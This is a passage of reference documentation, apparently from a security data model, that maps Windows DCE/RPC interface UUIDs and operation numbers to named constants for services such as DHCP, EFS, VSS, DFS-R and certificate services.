5b821720-f63b-11d0-aad2-00c04fc324db:82 XDM_CONST.DCERPC_OPERATION_R_DHCP_ADD_FILTER_V4

5b821720-f63b-11d0-aad2-00c04fc324db:83 XDM_CONST.DCERPC_OPERATION_R_DHCP_DELETE_FILTER_V4

5b821720-f63b-11d0-aad2-00c04fc324db:84 XDM_CONST.DCERPC_OPERATION_R_DHCP_SET_FILTER_V4

5b821720-f63b-11d0-aad2-00c04fc324db:85 XDM_CONST.DCERPC_OPERATION_R_DHCP_GET_FILTER_V4
 Original Mapped Description

5b821720-f63b-11d0-aad2-00c04fc324db:86 XDM_CONST.DCERPC_OPERATION_R_DHCP_ENUM_FILTER_V4

5b821720-f63b-11d0-aad2-00c04fc324db:87 XDM_CONST.DCERPC_OPERATION_R_DHCP_SET_DNS_REG_CREDENTIALS_V5

5b821720-f63b-11d0-aad2-00c04fc324db:88 XDM_CONST.DCERPC_OPERATION_R_DHCP_ENUM_SUBNET_CLIENTS_FILTER_STATUS_INFO

5b821720-f63b-11d0-aad2-00c04fc324db:89 XDM_CONST.DCERPC_OPERATION_R_DHCP_V4_FAILOVER_CREATE_RELATIONSHIP

5b821720-f63b-11d0-aad2-00c04fc324db:90 XDM_CONST.DCERPC_OPERATION_R_DHCP_V4_FAILOVER_SET_RELATIONSHIP

5b821720-f63b-11d0-aad2-00c04fc324db:91 XDM_CONST.DCERPC_OPERATION_R_DHCP_V4_FAILOVER_DELETE_RELATIONSHIP

5b821720-f63b-11d0-aad2-00c04fc324db:92 XDM_CONST.DCERPC_OPERATION_R_DHCP_V4_FAILOVER_GET_RELATIONSHIP

5b821720-f63b-11d0-aad2-00c04fc324db:93 XDM_CONST.DCERPC_OPERATION_R_DHCP_V4_FAILOVER_ENUM_RELATIONSHIP

5b821720-f63b-11d0-aad2-00c04fc324db:94 XDM_CONST.DCERPC_OPERATION_R_DHCP_V4_FAILOVER_ADD_SCOPE_TO_RELATIONSHIP

5b821720-f63b-11d0-aad2-00c04fc324db:95 XDM_CONST.DCERPC_OPERATION_R_DHCP_V4_FAILOVER_DELETE_SCOPE_FROM_RELATIONSHIP

5b821720-f63b-11d0-aad2-00c04fc324db:96 XDM_CONST.DCERPC_OPERATION_R_DHCP_V4_FAILOVER_GET_SCOPE_RELATIONSHIP

5b821720-f63b-11d0-aad2-00c04fc324db:97 XDM_CONST.DCERPC_OPERATION_R_DHCP_V4_FAILOVER_GET_SCOPE_STATISTICS

5b821720-f63b-11d0-aad2-00c04fc324db:98 XDM_CONST.DCERPC_OPERATION_R_DHCP_V4_FAILOVER_GET_CLIENT_INFO

5b821720-f63b-11d0-aad2-00c04fc324db:99 XDM_CONST.DCERPC_OPERATION_R_DHCP_V4_FAILOVER_GET_SYSTEM_TIME

5b821720-f63b-11d0-aad2-00c04fc324db:100 XDM_CONST.DCERPC_OPERATION_R_DHCP_V4_FAILOVER_TRIGGER_ADDR_ALLOCATION

5b821720-f63b-11d0-aad2-00c04fc324db:101 XDM_CONST.DCERPC_OPERATION_R_DHCP_V4_SET_OPTION_VALUE

5b821720-f63b-11d0-aad2-00c04fc324db:102 XDM_CONST.DCERPC_OPERATION_R_DHCP_V4_SET_OPTION_VALUES

5b821720-f63b-11d0-aad2-00c04fc324db:103 XDM_CONST.DCERPC_OPERATION_R_DHCP_V4_GET_OPTION_VALUE

5b821720-f63b-11d0-aad2-00c04fc324db:104 XDM_CONST.DCERPC_OPERATION_R_DHCP_V4_REMOVE_OPTION_VALUE

5b821720-f63b-11d0-aad2-00c04fc324db:105 XDM_CONST.DCERPC_OPERATION_R_DHCP_V4_GET_ALL_OPTION_VALUES

5b821720-f63b-11d0-aad2-00c04fc324db:106 XDM_CONST.DCERPC_OPERATION_R_DHCP_V4_QUERY_POLICY_ENFORCEMENT

5b821720-f63b-11d0-aad2-00c04fc324db:107 XDM_CONST.DCERPC_OPERATION_R_DHCP_SET_POLICY_ENFORCEMENT

5b821720-f63b-11d0-aad2-00c04fc324db:108 XDM_CONST.DCERPC_OPERATION_R_DHCP_V4_CREATE_POLICY

5b821720-f63b-11d0-aad2-00c04fc324db:109 XDM_CONST.DCERPC_OPERATION_R_DHCP_V4_GET_POLICY

5b821720-f63b-11d0-aad2-00c04fc324db:110 XDM_CONST.DCERPC_OPERATION_R_DHCP_V4_SET_POLICY

5b821720-f63b-11d0-aad2-00c04fc324db:111 XDM_CONST.DCERPC_OPERATION_R_DHCP_V4_DELETE_POLICY

5b821720-f63b-11d0-aad2-00c04fc324db:112 XDM_CONST.DCERPC_OPERATION_R_DHCP_V4_ENUM_POLICIES

5b821720-f63b-11d0-aad2-00c04fc324db:113 XDM_CONST.DCERPC_OPERATION_R_DHCP_V4_ADD_POLICY_RANGE

5b821720-f63b-11d0-aad2-00c04fc324db:114 XDM_CONST.DCERPC_OPERATION_R_DHCP_V4_REMOVE_POLICY_RANGE

5b821720-f63b-11d0-aad2-00c04fc324db:115 XDM_CONST.DCERPC_OPERATION_R_DHCP_V4_ENUM_SUBNET_CLIENTS

5b821720-f63b-11d0-aad2-00c04fc324db:116 XDM_CONST.DCERPC_OPERATION_R_DHCP_V6_SET_STATELESS_STORE_PARAMS

5b821720-f63b-11d0-aad2-00c04fc324db:117 XDM_CONST.DCERPC_OPERATION_R_DHCP_V6_GET_STATELESS_STORE_PARAMS

5b821720-f63b-11d0-aad2-00c04fc324db:118 XDM_CONST.DCERPC_OPERATION_R_DHCP_V6_GET_STATELESS_STATISTICS

5b821720-f63b-11d0-aad2-00c04fc324db:119 XDM_CONST.DCERPC_OPERATION_R_DHCP_V4_ENUM_SUBNET_RESERVATIONS

5b821720-f63b-11d0-aad2-00c04fc324db:120 XDM_CONST.DCERPC_OPERATION_R_DHCP_V4_GET_FREE_IP_ADDRESS

5b821720-f63b-11d0-aad2-00c04fc324db:121 XDM_CONST.DCERPC_OPERATION_R_DHCP_V6_GET_FREE_IP_ADDRESS

5b821720-f63b-11d0-aad2-00c04fc324db:122 XDM_CONST.DCERPC_OPERATION_R_DHCP_V4_CREATE_CLIENT_INFO

5b821720-f63b-11d0-aad2-00c04fc324db:123 XDM_CONST.DCERPC_OPERATION_R_DHCP_V4_GET_CLIENT_INFO

5b821720-f63b-11d0-aad2-00c04fc324db:124 XDM_CONST.DCERPC_OPERATION_R_DHCP_V6_CREATE_CLIENT_INFO

5b821720-f63b-11d0-aad2-00c04fc324db:125 XDM_CONST.DCERPC_OPERATION_R_DHCP_V4_FAILOVER_GET_ADDRESS_STATUS

5b821720-f63b-11d0-aad2-00c04fc324db:126 XDM_CONST.DCERPC_OPERATION_R_DHCP_V4_CREATE_POLICY_EX
 Original Mapped Description

5b821720-f63b-11d0-aad2-00c04fc324db:127 XDM_CONST.DCERPC_OPERATION_R_DHCP_V4_GET_POLICY_EX

5b821720-f63b-11d0-aad2-00c04fc324db:128 XDM_CONST.DCERPC_OPERATION_R_DHCP_V4_SET_POLICY_EX

5b821720-f63b-11d0-aad2-00c04fc324db:129 XDM_CONST.DCERPC_OPERATION_R_DHCP_V4_ENUM_POLICIES_EX

5b821720-f63b-11d0-aad2-00c04fc324db:130 XDM_CONST.DCERPC_OPERATION_R_DHCP_V4_ENUM_SUBNET_CLIENTS_EX

5b821720-f63b-11d0-aad2-00c04fc324db:131 XDM_CONST.DCERPC_OPERATION_R_DHCP_V4_CREATE_CLIENT_INFO_EX

5b821720-f63b-11d0-aad2-00c04fc324db:132 XDM_CONST.DCERPC_OPERATION_R_DHCP_V4_GET_CLIENT_INFO_EX

7c44d7d4-31d5-424c-bd5e-2b3e1f323d22:0 XDM_CONST.DCERPC_OPERATION_IDLDSA_PREPARE_SCRIPT

7c44d7d4-31d5-424c-bd5e-2b3e1f323d22:1 XDM_CONST.DCERPC_OPERATION_IDLDSA_EXECUTE_SCRIPT

77df7a80-f298-11d0-8358-00a024c480a8:0 XDM_CONST.DCERPC_OPERATION_SDS_CREATE_OBJECT

77df7a80-f298-11d0-8358-00a024c480a8:1 XDM_CONST.DCERPC_OPERATION_SDS_DELETE_OBJECT

77df7a80-f298-11d0-8358-00a024c480a8:2 XDM_CONST.DCERPC_OPERATION_SDS_GET_PROPS

77df7a80-f298-11d0-8358-00a024c480a8:3 XDM_CONST.DCERPC_OPERATION_SDS_SET_PROPS

77df7a80-f298-11d0-8358-00a024c480a8:4 XDM_CONST.DCERPC_OPERATION_SDS_GET_OBJECT_SECURITY

77df7a80-f298-11d0-8358-00a024c480a8:5 XDM_CONST.DCERPC_OPERATION_SDS_SET_OBJECT_SECURITY

77df7a80-f298-11d0-8358-00a024c480a8:6 XDM_CONST.DCERPC_OPERATION_SDS_LOOKUP_BEGIN

77df7a80-f298-11d0-8358-00a024c480a8:7 XDM_CONST.DCERPC_OPERATION_SDS_LOOKUP_NEXT

77df7a80-f298-11d0-8358-00a024c480a8:8 XDM_CONST.DCERPC_OPERATION_SDS_LOOKUP_END

77df7a80-f298-11d0-8358-00a024c480a8:10 XDM_CONST.DCERPC_OPERATION_SDS_DELETE_OBJECT_GUID

77df7a80-f298-11d0-8358-00a024c480a8:11 XDM_CONST.DCERPC_OPERATION_SDS_GET_PROPS_GUID

77df7a80-f298-11d0-8358-00a024c480a8:12 XDM_CONST.DCERPC_OPERATION_SDS_SET_PROPS_GUID

77df7a80-f298-11d0-8358-00a024c480a8:13 XDM_CONST.DCERPC_OPERATION_SDS_GET_OBJECT_SECURITY_GUID

77df7a80-f298-11d0-8358-00a024c480a8:14 XDM_CONST.DCERPC_OPERATION_SDS_SET_OBJECT_SECURITY_GUID

77df7a80-f298-11d0-8358-00a024c480a8:19 XDM_CONST.DCERPC_OPERATION_SDSQM_SET_MACHINE_PROPERTIES

77df7a80-f298-11d0-8358-00a024c480a8:20 XDM_CONST.DCERPC_OPERATION_SDS_CREATE_SERVERS_CACHE

77df7a80-f298-11d0-8358-00a024c480a8:21 XDM_CONST.DCERPC_OPERATION_SDSQM_GET_OBJECT_SECURITY

77df7a80-f298-11d0-8358-00a024c480a8:22 XDM_CONST.DCERPC_OPERATION_SDS_VALIDATE_SERVER

77df7a80-f298-11d0-8358-00a024c480a8:23 XDM_CONST.DCERPC_OPERATION_SDS_CLOSE_SERVER_HANDLE

77df7a80-f298-11d0-8358-00a024c480a8:27 XDM_CONST.DCERPC_OPERATION_SDS_GET_SERVER_PORT

708cca10-9569-11d1-b2a5-0060977d8118:0 XDM_CONST.DCERPC_OPERATION_SDS_GET_COMPUTER_SITES

708cca10-9569-11d1-b2a5-0060977d8118:1 XDM_CONST.DCERPC_OPERATION_SDS_GET_PROPS_EX

708cca10-9569-11d1-b2a5-0060977d8118:2 XDM_CONST.DCERPC_OPERATION_SDS_GET_PROPS_GUID_EX

708cca10-9569-11d1-b2a5-0060977d8118:3 XDM_CONST.DCERPC_OPERATION_SDS_BEGIN_DELETE_NOTIFICATION

708cca10-9569-11d1-b2a5-0060977d8118:4 XDM_CONST.DCERPC_OPERATION_SDS_NOTIFY_DELETE

708cca10-9569-11d1-b2a5-0060977d8118:5 XDM_CONST.DCERPC_OPERATION_SDS_END_DELETE_NOTIFICATION

708cca10-9569-11d1-b2a5-0060977d8118:6 XDM_CONST.DCERPC_OPERATION_SDS_IS_SERVER_GC

708cca10-9569-11d1-b2a5-0060977d8118:8 XDM_CONST.DCERPC_OPERATION_SDS_GET_GC_LIST_IN_DOMAIN

df1941c5-fe89-4e79-bf10-463657acf44d:0 XDM_CONST.DCERPC_OPERATION_EFS_RPC_OPEN_FILE_RAW

df1941c5-fe89-4e79-bf10-463657acf44d:1 XDM_CONST.DCERPC_OPERATION_EFS_RPC_READ_FILE_RAW

df1941c5-fe89-4e79-bf10-463657acf44d:2 XDM_CONST.DCERPC_OPERATION_EFS_RPC_WRITE_FILE_RAW

df1941c5-fe89-4e79-bf10-463657acf44d:3 XDM_CONST.DCERPC_OPERATION_EFS_RPC_CLOSE_RAW

df1941c5-fe89-4e79-bf10-463657acf44d:4 XDM_CONST.DCERPC_OPERATION_EFS_RPC_ENCRYPT_FILE_SRV
 Original Mapped Description

df1941c5-fe89-4e79-bf10-463657acf44d:5 XDM_CONST.DCERPC_OPERATION_EFS_DECRYPT_FILE_SRV

df1941c5-fe89-4e79-bf10-463657acf44d:6 XDM_CONST.DCERPC_OPERATION_EFS_RPC_QUERY_USERS_ON_FILE

df1941c5-fe89-4e79-bf10-463657acf44d:7 XDM_CONST.DCERPC_OPERATION_EFS_RPC_QUERY_RECOVERY_AGENTS

df1941c5-fe89-4e79-bf10-463657acf44d:8 XDM_CONST.DCERPC_OPERATION_EFS_RPC_REMOVE_USERS_FROM_FILE

df1941c5-fe89-4e79-bf10-463657acf44d:9 XDM_CONST.DCERPC_OPERATION_EFS_RPC_ADD_USERS_TO_FILE

df1941c5-fe89-4e79-bf10-463657acf44d:11 XDM_CONST.DCERPC_OPERATION_EFS_RPC_NOT_SUPPORTED

df1941c5-fe89-4e79-bf10-463657acf44d:12 XDM_CONST.DCERPC_OPERATION_EFS_RPC_FILE_KEY_INFO

df1941c5-fe89-4e79-bf10-463657acf44d:13 XDM_CONST.DCERPC_OPERATION_EFS_RPC_DUPLICATE_ENCRYPTION_INFO_FILE

df1941c5-fe89-4e79-bf10-463657acf44d:15 XDM_CONST.DCERPC_OPERATION_EFS_RPC_ADD_USERS_TO_FILE_EX

df1941c5-fe89-4e79-bf10-463657acf44d:16 XDM_CONST.DCERPC_OPERATION_EFS_RPC_FILE_KEY_INFO_EX

df1941c5-fe89-4e79-bf10-463657acf44d:18 XDM_CONST.DCERPC_OPERATION_EFS_RPC_GET_ENCRYPTED_FILE_METADATA

df1941c5-fe89-4e79-bf10-463657acf44d:19 XDM_CONST.DCERPC_OPERATION_EFS_RPC_SET_ENCRYPTED_FILE_METADATA

df1941c5-fe89-4e79-bf10-463657acf44d:20 XDM_CONST.DCERPC_OPERATION_EFS_RPC_FLUSH_EFS_CACHE

df1941c5-fe89-4e79-bf10-463657acf44d:21 XDM_CONST.DCERPC_OPERATION_EFS_RPC_ENCRYPT_FILE_EX_SERV

df1941c5-fe89-4e79-bf10-463657acf44d:22 XDM_CONST.DCERPC_OPERATION_EFS_RPC_QUERY_PROTECTORS

c681d488-d850-11d0-8c52-00c04fd90f7e:0 XDM_CONST.DCERPC_OPERATION_EFS_RPC_OPEN_FILE_RAW

c681d488-d850-11d0-8c52-00c04fd90f7e:1 XDM_CONST.DCERPC_OPERATION_EFS_RPC_READ_FILE_RAW

c681d488-d850-11d0-8c52-00c04fd90f7e:2 XDM_CONST.DCERPC_OPERATION_EFS_RPC_WRITE_FILE_RAW

c681d488-d850-11d0-8c52-00c04fd90f7e:3 XDM_CONST.DCERPC_OPERATION_EFS_RPC_CLOSE_RAW

c681d488-d850-11d0-8c52-00c04fd90f7e:4 XDM_CONST.DCERPC_OPERATION_EFS_RPC_ENCRYPT_FILE_SRV

c681d488-d850-11d0-8c52-00c04fd90f7e:5 XDM_CONST.DCERPC_OPERATION_EFS_DECRYPT_FILE_SRV

c681d488-d850-11d0-8c52-00c04fd90f7e:6 XDM_CONST.DCERPC_OPERATION_EFS_RPC_QUERY_USERS_ON_FILE

c681d488-d850-11d0-8c52-00c04fd90f7e:7 XDM_CONST.DCERPC_OPERATION_EFS_RPC_QUERY_RECOVERY_AGENTS

c681d488-d850-11d0-8c52-00c04fd90f7e:8 XDM_CONST.DCERPC_OPERATION_EFS_RPC_REMOVE_USERS_FROM_FILE

c681d488-d850-11d0-8c52-00c04fd90f7e:9 XDM_CONST.DCERPC_OPERATION_EFS_RPC_ADD_USERS_TO_FILE

c681d488-d850-11d0-8c52-00c04fd90f7e:11 XDM_CONST.DCERPC_OPERATION_EFS_RPC_NOT_SUPPORTED

c681d488-d850-11d0-8c52-00c04fd90f7e:12 XDM_CONST.DCERPC_OPERATION_EFS_RPC_FILE_KEY_INFO

c681d488-d850-11d0-8c52-00c04fd90f7e:13 XDM_CONST.DCERPC_OPERATION_EFS_RPC_DUPLICATE_ENCRYPTION_INFO_FILE

c681d488-d850-11d0-8c52-00c04fd90f7e:15 XDM_CONST.DCERPC_OPERATION_EFS_RPC_ADD_USERS_TO_FILE_EX

c681d488-d850-11d0-8c52-00c04fd90f7e:16 XDM_CONST.DCERPC_OPERATION_EFS_RPC_FILE_KEY_INFO_EX

c681d488-d850-11d0-8c52-00c04fd90f7e:18 XDM_CONST.DCERPC_OPERATION_EFS_RPC_GET_ENCRYPTED_FILE_METADATA

c681d488-d850-11d0-8c52-00c04fd90f7e:19 XDM_CONST.DCERPC_OPERATION_EFS_RPC_SET_ENCRYPTED_FILE_METADATA

c681d488-d850-11d0-8c52-00c04fd90f7e:20 XDM_CONST.DCERPC_OPERATION_EFS_RPC_FLUSH_EFS_CACHE

c681d488-d850-11d0-8c52-00c04fd90f7e:21 XDM_CONST.DCERPC_OPERATION_EFS_RPC_ENCRYPT_FILE_EX_SERV

c681d488-d850-11d0-8c52-00c04fd90f7e:22 XDM_CONST.DCERPC_OPERATION_EFS_RPC_QUERY_PROTECTORS

a8e0653c-2744-4389-a61d-7373df8b2292:0 XDM_CONST.DCERPC_OPERATION_GET_SUPPORTED_VERSION

a8e0653c-2744-4389-a61d-7373df8b2292:1 XDM_CONST.DCERPC_OPERATION_SET_CONTEXT

a8e0653c-2744-4389-a61d-7373df8b2292:2 XDM_CONST.DCERPC_OPERATION_START_SHADOW_COPY_SET

a8e0653c-2744-4389-a61d-7373df8b2292:3 XDM_CONST.DCERPC_OPERATION_ADD_TO_SHADOW_COPY_SET

a8e0653c-2744-4389-a61d-7373df8b2292:4 XDM_CONST.DCERPC_OPERATION_COMMIT_SHADOW_COPY_SET

a8e0653c-2744-4389-a61d-7373df8b2292:5 XDM_CONST.DCERPC_OPERATION_EXPOSE_SHADOW_COPY_SET
 Original Mapped Description

a8e0653c-2744-4389-a61d-7373df8b2292:6 XDM_CONST.DCERPC_OPERATION_RECOVERY_COMPLETE_SHADOW_COPY_SET

a8e0653c-2744-4389-a61d-7373df8b2292:7 XDM_CONST.DCERPC_OPERATION_ABORT_SHADOW_COPY_SET

a8e0653c-2744-4389-a61d-7373df8b2292:8 XDM_CONST.DCERPC_OPERATION_IS_PATH_SUPPORTED

a8e0653c-2744-4389-a61d-7373df8b2292:9 XDM_CONST.DCERPC_OPERATION_IS_PATH_SHADOW_COPIED

a8e0653c-2744-4389-a61d-7373df8b2292:10 XDM_CONST.DCERPC_OPERATION_GET_SHARE_MAPPING

a8e0653c-2744-4389-a61d-7373df8b2292:11 XDM_CONST.DCERPC_OPERATION_DELETE_SHARE_MAPPING

a8e0653c-2744-4389-a61d-7373df8b2292:12 XDM_CONST.DCERPC_OPERATION_PREPARE_SHADOW_COPY

897e2e5f-93f3-4376-9c9c-fd2277495c27:0 XDM_CONST.DCERPC_OPERATION_CHECK_CONNECTIVITY

897e2e5f-93f3-4376-9c9c-fd2277495c27:1 XDM_CONST.DCERPC_OPERATION_ESTABLISH_CONNECTION

897e2e5f-93f3-4376-9c9c-fd2277495c27:2 XDM_CONST.DCERPC_OPERATION_ESTABLISH_SESSION

897e2e5f-93f3-4376-9c9c-fd2277495c27:3 XDM_CONST.DCERPC_OPERATION_REQUEST_UPDATES

897e2e5f-93f3-4376-9c9c-fd2277495c27:4 XDM_CONST.DCERPC_OPERATION_REQUEST_VERSION_VECTOR

897e2e5f-93f3-4376-9c9c-fd2277495c27:5 XDM_CONST.DCERPC_OPERATION_ASYNC_POLL

897e2e5f-93f3-4376-9c9c-fd2277495c27:6 XDM_CONST.DCERPC_OPERATION_REQUEST_RECORDS

897e2e5f-93f3-4376-9c9c-fd2277495c27:7 XDM_CONST.DCERPC_OPERATION_UPDATE_CANCEL

897e2e5f-93f3-4376-9c9c-fd2277495c27:8 XDM_CONST.DCERPC_OPERATION_RAW_GET_FILE_DATA

897e2e5f-93f3-4376-9c9c-fd2277495c27:9 XDM_CONST.DCERPC_OPERATION_RDC_GET_SIGNATURES

897e2e5f-93f3-4376-9c9c-fd2277495c27:10 XDM_CONST.DCERPC_OPERATION_RDC_PUSH_SOURCE_NEEDS

897e2e5f-93f3-4376-9c9c-fd2277495c27:11 XDM_CONST.DCERPC_OPERATION_RDC_GET_FILE_DATA

897e2e5f-93f3-4376-9c9c-fd2277495c27:12 XDM_CONST.DCERPC_OPERATION_RDC_CLOSE

897e2e5f-93f3-4376-9c9c-fd2277495c27:13 XDM_CONST.DCERPC_OPERATION_INITIALIZE_FILE_TRANSFER_ASYNC

897e2e5f-93f3-4376-9c9c-fd2277495c27:15 XDM_CONST.DCERPC_OPERATION_RAW_GET_FILE_DATA_ASYNC

897e2e5f-93f3-4376-9c9c-fd2277495c27:16 XDM_CONST.DCERPC_OPERATION_RDC_GET_FILE_DATA_ASYNC

897e2e5f-93f3-4376-9c9c-fd2277495c27:17 XDM_CONST.DCERPC_OPERATION_RDC_FILE_DATA_TRANSFER_KEEP_ALIVE

4bb8ab1d-9ef9-4100-8eb6-dd4b4e418b72:3 XDM_CONST.DCERPC_OPERATION_CREATE_OBJECT

4bb8ab1d-9ef9-4100-8eb6-dd4b4e418b72:4 XDM_CONST.DCERPC_OPERATION_DELETE_OBJECT

4bb8ab1d-9ef9-4100-8eb6-dd4b4e418b72:5 XDM_CONST.DCERPC_OPERATION_MODIFY_OBJECT

c4b0c7d9-abe0-4733-a1e1-9fdedf260c7a:6 XDM_CONST.DCERPC_OPERATION_CREATE_OBJECT

c4b0c7d9-abe0-4733-a1e1-9fdedf260c7a:7 XDM_CONST.DCERPC_OPERATION_DELETE_OBJECT

c4b0c7d9-abe0-4733-a1e1-9fdedf260c7a:8 XDM_CONST.DCERPC_OPERATION_MODIFY_OBJECT

d99e6e71-fc88-11d0-b498-00a0c90312f3:3 XDM_CONST.DCERPC_OPERATION_SET_EXTENSION

d99e6e71-fc88-11d0-b498-00a0c90312f3:4 XDM_CONST.DCERPC_OPERATION_SET_ATTRIBUTES

d99e6e71-fc88-11d0-b498-00a0c90312f3:5 XDM_CONST.DCERPC_OPERATION_RESUBMIT_REQUEST

d99e6e71-fc88-11d0-b498-00a0c90312f3:6 XDM_CONST.DCERPC_OPERATION_DENY_REQUEST

d99e6e71-fc88-11d0-b498-00a0c90312f3:7 XDM_CONST.DCERPC_OPERATION_IS_VALID_CERTIFICATE

d99e6e71-fc88-11d0-b498-00a0c90312f3:8 XDM_CONST.DCERPC_OPERATION_PUBLISH_CRL

d99e6e71-fc88-11d0-b498-00a0c90312f3:9 XDM_CONST.DCERPC_OPERATION_GET_CRL

d99e6e71-fc88-11d0-b498-00a0c90312f3:10 XDM_CONST.DCERPC_OPERATION_REVOKE_CERTIFICATE

d99e6e71-fc88-11d0-b498-00a0c90312f3:11 XDM_CONST.DCERPC_OPERATION_ENUM_VIEW_COLUMN

d99e6e71-fc88-11d0-b498-00a0c90312f3:12 XDM_CONST.DCERPC_OPERATION_GET_VIEW_DEFAULT_COLUMN_SET

d99e6e71-fc88-11d0-b498-00a0c90312f3:13 XDM_CONST.DCERPC_OPERATION_ENUM_ATTRIBUTES_OR_EXTENSIONS
 Original Mapped Description

d99e6e71-fc88-11d0-b498-00a0c90312f3:14 XDM_CONST.DCERPC_OPERATION_OPEN_VIEW

d99e6e71-fc88-11d0-b498-00a0c90312f3:15 XDM_CONST.DCERPC_OPERATION_ENUM_VIEW

d99e6e71-fc88-11d0-b498-00a0c90312f3:16 XDM_CONST.DCERPC_OPERATION_CLOSE_VIEW

d99e6e71-fc88-11d0-b498-00a0c90312f3:17 XDM_CONST.DCERPC_OPERATION_SERVER_CONTROL

d99e6e71-fc88-11d0-b498-00a0c90312f3:18 XDM_CONST.DCERPC_OPERATION_PING

d99e6e71-fc88-11d0-b498-00a0c90312f3:19 XDM_CONST.DCERPC_OPERATION_GET_SERVER_STATE

d99e6e71-fc88-11d0-b498-00a0c90312f3:20 XDM_CONST.DCERPC_OPERATION_BACKUP_PREPARE

d99e6e71-fc88-11d0-b498-00a0c90312f3:21 XDM_CONST.DCERPC_OPERATION_BACKUP_END

d99e6e71-fc88-11d0-b498-00a0c90312f3:22 XDM_CONST.DCERPC_OPERATION_BACKUP_GET_ATTACHMENT_INFORMATION

d99e6e71-fc88-11d0-b498-00a0c90312f3:23 XDM_CONST.DCERPC_OPERATION_BACKUP_GET_BACKUP_LOGS

d99e6e71-fc88-11d0-b498-00a0c90312f3:24 XDM_CONST.DCERPC_OPERATION_BACKUP_OPEN_FILE

d99e6e71-fc88-11d0-b498-00a0c90312f3:25 XDM_CONST.DCERPC_OPERATION_BACKUP_READ_FILE

d99e6e71-fc88-11d0-b498-00a0c90312f3:26 XDM_CONST.DCERPC_OPERATION_BACKUP_CLOSE_FILE

d99e6e71-fc88-11d0-b498-00a0c90312f3:27 XDM_CONST.DCERPC_OPERATION_BACKUP_TRUNCATE_LOGS

d99e6e71-fc88-11d0-b498-00a0c90312f3:28 XDM_CONST.DCERPC_OPERATION_IMPORT_CERTIFICATE

d99e6e71-fc88-11d0-b498-00a0c90312f3:29 XDM_CONST.DCERPC_OPERATION_BACKUP_GET_DYNAMIC_FILES

d99e6e71-fc88-11d0-b498-00a0c90312f3:30 XDM_CONST.DCERPC_OPERATION_RESTORE_GET_DATABASE_LOCATIONS

7fe0d935-dda6-443f-85d0-1cfb58fe41dd:31 XDM_CONST.DCERPC_OPERATION_PUBLISH_CR_LS

7fe0d935-dda6-443f-85d0-1cfb58fe41dd:32 XDM_CONST.DCERPC_OPERATION_GET_CA_PROPERTY

7fe0d935-dda6-443f-85d0-1cfb58fe41dd:33 XDM_CONST.DCERPC_OPERATION_SET_CA_PROPERTY

7fe0d935-dda6-443f-85d0-1cfb58fe41dd:34 XDM_CONST.DCERPC_OPERATION_GET_CA_PROPERTY_INFO

7fe0d935-dda6-443f-85d0-1cfb58fe41dd:35 XDM_CONST.DCERPC_OPERATION_ENUM_VIEW_COLUMN_TABLE

7fe0d935-dda6-443f-85d0-1cfb58fe41dd:36 XDM_CONST.DCERPC_OPERATION_GET_CA_SECURITY

7fe0d935-dda6-443f-85d0-1cfb58fe41dd:37 XDM_CONST.DCERPC_OPERATION_SET_CA_SECURITY

7fe0d935-dda6-443f-85d0-1cfb58fe41dd:38 XDM_CONST.DCERPC_OPERATION_PING2

7fe0d935-dda6-443f-85d0-1cfb58fe41dd:39 XDM_CONST.DCERPC_OPERATION_GET_ARCHIVED_KEY

7fe0d935-dda6-443f-85d0-1cfb58fe41dd:40 XDM_CONST.DCERPC_OPERATION_GET_AUDIT_FILTER

7fe0d935-dda6-443f-85d0-1cfb58fe41dd:41 XDM_CONST.DCERPC_OPERATION_SET_AUDIT_FILTER

7fe0d935-dda6-443f-85d0-1cfb58fe41dd:42 XDM_CONST.DCERPC_OPERATION_GET_OFFICER_RIGHTS

7fe0d935-dda6-443f-85d0-1cfb58fe41dd:43 XDM_CONST.DCERPC_OPERATION_SET_OFFICER_RIGHTS

7fe0d935-dda6-443f-85d0-1cfb58fe41dd:44 XDM_CONST.DCERPC_OPERATION_GET_CONFIG_ENTRY

7fe0d935-dda6-443f-85d0-1cfb58fe41dd:45 XDM_CONST.DCERPC_OPERATION_SET_CONFIG_ENTRY

7fe0d935-dda6-443f-85d0-1cfb58fe41dd:46 XDM_CONST.DCERPC_OPERATION_IMPORT_KEY

7fe0d935-dda6-443f-85d0-1cfb58fe41dd:47 XDM_CONST.DCERPC_OPERATION_GET_MY_ROLES

7fe0d935-dda6-443f-85d0-1cfb58fe41dd:48 XDM_CONST.DCERPC_OPERATION_DELETE_ROW

d99e6e70-fc88-11d0-b498-00a0c90312f3:3 XDM_CONST.DCERPC_OPERATION_REQUEST

d99e6e70-fc88-11d0-b498-00a0c90312f3:4 XDM_CONST.DCERPC_OPERATION_GET_CA_CERT

d99e6e70-fc88-11d0-b498-00a0c90312f3:5 XDM_CONST.DCERPC_OPERATION_PING

5422fd3a-d4b8-4cef-a12e-e87d4ca22e90:3 XDM_CONST.DCERPC_OPERATION_REQUEST

5422fd3a-d4b8-4cef-a12e-e87d4ca22e90:4 XDM_CONST.DCERPC_OPERATION_GET_CA_CERT

5422fd3a-d4b8-4cef-a12e-e87d4ca22e90:5 XDM_CONST.DCERPC_OPERATION_PING
 Original Mapped Description

5422fd3a-d4b8-4cef-a12e-e87d4ca22e90:6 XDM_CONST.DCERPC_OPERATION_REQUEST2

5422fd3a-d4b8-4cef-a12e-e87d4ca22e90:7 XDM_CONST.DCERPC_OPERATION_GET_CA_PROPERTY

5422fd3a-d4b8-4cef-a12e-e87d4ca22e90:8 XDM_CONST.DCERPC_OPERATION_GET_CA_PROPERTY_INFO

5422fd3a-d4b8-4cef-a12e-e87d4ca22e90:9 XDM_CONST.DCERPC_OPERATION_PING2

00020400-0000-0000-c000-000000000046:3 XDM_CONST.DCERPC_OPERATION_GET_TYPE_INFO_COUNT

00020400-0000-0000-c000-000000000046:4 XDM_CONST.DCERPC_OPERATION_GET_TYPE_INFO

00020400-0000-0000-c000-000000000046:5 XDM_CONST.DCERPC_OPERATION_GET_I_DS_OF_NAMES

00020400-0000-0000-c000-000000000046:6 XDM_CONST.DCERPC_OPERATION_INVOKE

00020401-0000-0000-c000-000000000046:3 XDM_CONST.DCERPC_OPERATION_GET_TYPE_ATTR

00020401-0000-0000-c000-000000000046:4 XDM_CONST.DCERPC_OPERATION_GET_TYPE_COMP

00020401-0000-0000-c000-000000000046:5 XDM_CONST.DCERPC_OPERATION_GET_FUNC_DESC

00020401-0000-0000-c000-000000000046:6 XDM_CONST.DCERPC_OPERATION_GET_VAR_DESC

00020401-0000-0000-c000-000000000046:7 XDM_CONST.DCERPC_OPERATION_GET_NAMES

00020401-0000-0000-c000-000000000046:8 XDM_CONST.DCERPC_OPERATION_GET_REF_TYPE_OF_IMPL_TYPE

